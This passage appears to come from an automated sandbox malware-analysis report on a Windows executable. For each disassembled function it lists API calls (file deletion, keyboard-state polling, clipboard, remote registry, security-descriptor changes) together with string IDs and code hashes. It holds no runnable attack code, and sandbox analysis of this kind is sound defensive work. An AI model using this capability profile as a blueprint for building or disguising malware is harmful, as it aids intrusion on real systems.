                                    • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1C55
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1C5F
                                    • FindClose.KERNEL32(00000000), ref: 009D1C6C
                                    • FindClose.KERNEL32(00000000), ref: 009D1C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                    • Instruction ID: bda6d1c2248e13cb5046cf46814428c8a24eb548b3b6eed2e1860256d907e9b7
                                    • Opcode Fuzzy Hash: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
                                    • Instruction Fuzzy Hash: 49318033A84219BBDF10EBF0DC49BDE77ACAF45324F148557F811E2190EB74DA868A64
                                    Function 009EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • DragQueryPoint.SHELL32(?,?), ref: 009EF37A
                                      • Part of subcall function 009ED7DE: ClientToScreen.USER32(?,?), ref: 009ED807
                                      • Part of subcall function 009ED7DE: GetWindowRect.USER32(?,?), ref: 009ED87D
                                      • Part of subcall function 009ED7DE: PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF3E3
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009EF3EE
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009EF411
                                    • _wcscat.LIBCMT ref: 009EF441
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009EF458
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EF471
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF488
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 009EF4AA
                                    • DragFinish.SHELL32(?), ref: 009EF4B1
                                    • NtdllDialogWndProc_W.USER32(?,00000233,?,00000000,?,?,?), ref: 009EF59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                    • Instruction ID: d17761d23241e0135fed87600a8023349eabfecc764f219292ec638999ae86fd
                                    • Opcode Fuzzy Hash: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
                                    • Instruction Fuzzy Hash: D5613A72108344AFC701EFA4CC85E9BBBE8BFC9710F000A1EB595921A1DB71DA4ACB52
                                    Function 009D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009D1CAB
                                    • _wcscmp.LIBCMT ref: 009D1CC0
                                    • _wcscmp.LIBCMT ref: 009D1CD7
                                      • Part of subcall function 009C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009C6BEF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009D1D06
                                    • FindClose.KERNEL32(00000000), ref: 009D1D11
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1D2D
                                    • _wcscmp.LIBCMT ref: 009D1D54
                                    • _wcscmp.LIBCMT ref: 009D1D6B
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1D7D
                                    • SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1D9B
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1DA5
                                    • FindClose.KERNEL32(00000000), ref: 009D1DB2
                                    • FindClose.KERNEL32(00000000), ref: 009D1DC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                    • Instruction ID: 417264114bd67a972619bdbaca68f8a38bf22b8a2192b2e52aa92de2bba22194
                                    • Opcode Fuzzy Hash: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                    • Instruction Fuzzy Hash: 6C31D43394461EBADF10EFE0DC09BDE77ADAF45324F148556F801A22D1DB70DA868A64
                                    Function 009D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 009D09DF
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D09EF
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009D09FB
                                    • __wsplitpath.LIBCMT ref: 009D0A59
                                    • _wcscat.LIBCMT ref: 009D0A71
                                    • _wcscat.LIBCMT ref: 009D0A83
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D0A98
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AAC
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0ADE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AFF
                                    • _wcscpy.LIBCMT ref: 009D0B0B
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009D0B4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                    • Instruction ID: 9f6f1332383dcad8fe6be7be9bf1c44d6853bda77e6cce547dc3498ff1df62dd
                                    • Opcode Fuzzy Hash: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                    • Instruction Fuzzy Hash: 4A6136725082059FDB10EF60C845AAEB3E8FFC9314F04891EF99997351EB35EA45CB92
                                    Function 009EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009EEF3B
                                    • GetFocus.USER32 ref: 009EEF4B
                                    • GetDlgCtrlID.USER32(00000000), ref: 009EEF56
                                    • _memset.LIBCMT ref: 009EF081
                                    • GetMenuItemInfoW.USER32 ref: 009EF0AC
                                    • GetMenuItemCount.USER32(00000000), ref: 009EF0CC
                                    • GetMenuItemID.USER32(?,00000000), ref: 009EF0DF
                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 009EF113
                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 009EF15B
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009EF193
                                    • NtdllDialogWndProc_W.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009EF1C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 571449ab374eff30ae35eb19b4b37b612b05faa31a917df6609c0de38b387cf6
                                    • Instruction ID: 369ed231cf425bd431491737d84534d23c80ce5b8ef20d0308eea3c5d6fb61f6
                                    • Opcode Fuzzy Hash: 571449ab374eff30ae35eb19b4b37b612b05faa31a917df6609c0de38b387cf6
                                    • Instruction Fuzzy Hash: 27819F71608345EFDB11CF56C894A6BBBE9FB88314F00492EF99897291D731DD06CB92
                                    Function 009BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                      • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                      • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                      • Part of subcall function 009BABBB: RtlAllocateHeap.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                      • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                      • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                      • Part of subcall function 009BAC56: RtlAllocateHeap.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                      • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA6D0
                                    • _memset.LIBCMT ref: 009BA6E5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA704
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA715
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 009BA752
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA76E
                                    • GetLengthSid.ADVAPI32(?), ref: 009BA78B
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA79A
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BA7A1
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA7C2
                                    • CopySid.ADVAPI32(00000000), ref: 009BA7C9
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA7FA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BA820
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BA834
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                    • Instruction ID: 1904bd344abf948cd9e6d2c0f288186cd1a90dd57b65ffd0df9b574e9b12d0cb
                                    • Opcode Fuzzy Hash: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                    • Instruction Fuzzy Hash: 2F514A71900209ABDF14DFE5DD85AEEBBB9FF44310F048129F915A72A0DB359A06CB61
                                    Function 00986F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                    • Instruction ID: 271aedc37b367ab4d2a7f9193d9e5c8566e0f5090ce6e284fa19bee1e72e52e7
                                    • Opcode Fuzzy Hash: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                    • Instruction Fuzzy Hash: 5D727F71E04219DBDF24DF98D8807AEB7B5BF48310F24816AE915EB390DB749E81DB90
                                    Function 009C63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • _wcscat.LIBCMT ref: 009C6441
                                    • __wsplitpath.LIBCMT ref: 009C645F
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009C6474
                                    • _wcscpy.LIBCMT ref: 009C64A3
                                    • _wcscat.LIBCMT ref: 009C64B8
                                    • _wcscat.LIBCMT ref: 009C64CA
                                    • DeleteFileW.KERNEL32(?), ref: 009C64DA
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C64EB
                                    • FindClose.KERNEL32(00000000), ref: 009C6506
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                    • String ID: \*.*
                                    • API String ID: 2643075503-1173974218
                                    • Opcode ID: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                    • Instruction ID: 7457d804b62220d72783b97de051c15627e43f1bd8c10b9e500d63f25a4cff95
                                    • Opcode Fuzzy Hash: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                    • Instruction Fuzzy Hash: 413121B2808388AAC721DBE48885EDBB7ECAB96310F44491EF5D9C3141EB35D54987A7
                                    Function 009E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E328E
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009E332D
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009E33C5
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009E3604
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E3611
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: 6b3185801c3458733973a8780eefd7b7288fd397497f074f49069eb60b8163c4
                                    • Instruction ID: 5c1c4b0427857c5ea6c36ab3ac934a1b5d7c3e396a8e68c61c3ed8dfaa41598a
                                    • Opcode Fuzzy Hash: 6b3185801c3458733973a8780eefd7b7288fd397497f074f49069eb60b8163c4
                                    • Instruction Fuzzy Hash: A2E13A71604200AFCB15DF69C995E2ABBE8EF88714B04C96DF44ADB3A1DB30ED05CB52
                                    Function 009C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 009C2B5F
                                    • GetAsyncKeyState.USER32(000000A0), ref: 009C2BE0
                                    • GetKeyState.USER32(000000A0), ref: 009C2BFB
                                    • GetAsyncKeyState.USER32(000000A1), ref: 009C2C15
                                    • GetKeyState.USER32(000000A1), ref: 009C2C2A
                                    • GetAsyncKeyState.USER32(00000011), ref: 009C2C42
                                    • GetKeyState.USER32(00000011), ref: 009C2C54
                                    • GetAsyncKeyState.USER32(00000012), ref: 009C2C6C
                                    • GetKeyState.USER32(00000012), ref: 009C2C7E
                                    • GetAsyncKeyState.USER32(0000005B), ref: 009C2C96
                                    • GetKeyState.USER32(0000005B), ref: 009C2CA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                    • Instruction ID: cb89be99190bcde77a74580a86ff6bbd66c60aab35a1646ba3896017a9bccba8
                                    • Opcode Fuzzy Hash: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                    • Instruction Fuzzy Hash: 7F41C734D447C96DFF359BA48814BB9BEA86F22344F04809DD9C6562C2DBA49DC8C7A3
                                    Function 009D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                    • Instruction ID: 65deb1d6a3221a6a3e0d3ced408760198d60ce233975d891181f6321385ed1ac
                                    • Opcode Fuzzy Hash: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                    • Instruction Fuzzy Hash: 1F21A336340214AFDB11EF98EC49F6D77A9EF84710F04841AF94ADB2A1DB35EC028B51
                                    Function 009EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                      • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    • 6F58C580.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 009EED3C
                                    • 6F58C6F0.COMCTL32 ref: 009EED42
                                    • ReleaseCapture.USER32 ref: 009EED48
                                    • SetWindowTextW.USER32(?,00000000), ref: 009EEDF0
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009EEE03
                                    • NtdllDialogWndProc_W.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 009EEEDC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AsyncStateWindow$C580CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 351792193-2107944366
                                    • Opcode ID: 2e2df6e4c7e927b0d8a241fc2283092a2fae1c023dd35d730a9546f4bda0679d
                                    • Instruction ID: 27a822b81a02542aac2ffff546cf28f8d2d324f3e4bad50e0de5851aff05bc96
                                    • Opcode Fuzzy Hash: 2e2df6e4c7e927b0d8a241fc2283092a2fae1c023dd35d730a9546f4bda0679d
                                    • Instruction Fuzzy Hash: F651A978204304AFD710EF64CC86F6AB7E8FB88304F00491DF585962E2DB71E945CB52
                                    Function 009DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009B9ABF: CLSIDFromProgID.OLE32 ref: 009B9ADC
                                      • Part of subcall function 009B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                      • Part of subcall function 009B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                      • Part of subcall function 009B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009DC235
                                    • _memset.LIBCMT ref: 009DC242
                                    • _memset.LIBCMT ref: 009DC360
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 009DC38C
                                    • CoTaskMemFree.OLE32(?), ref: 009DC397
                                    Strings
                                    • NULL Pointer assignment, xrefs: 009DC3E5
                                    Memory Dump Source
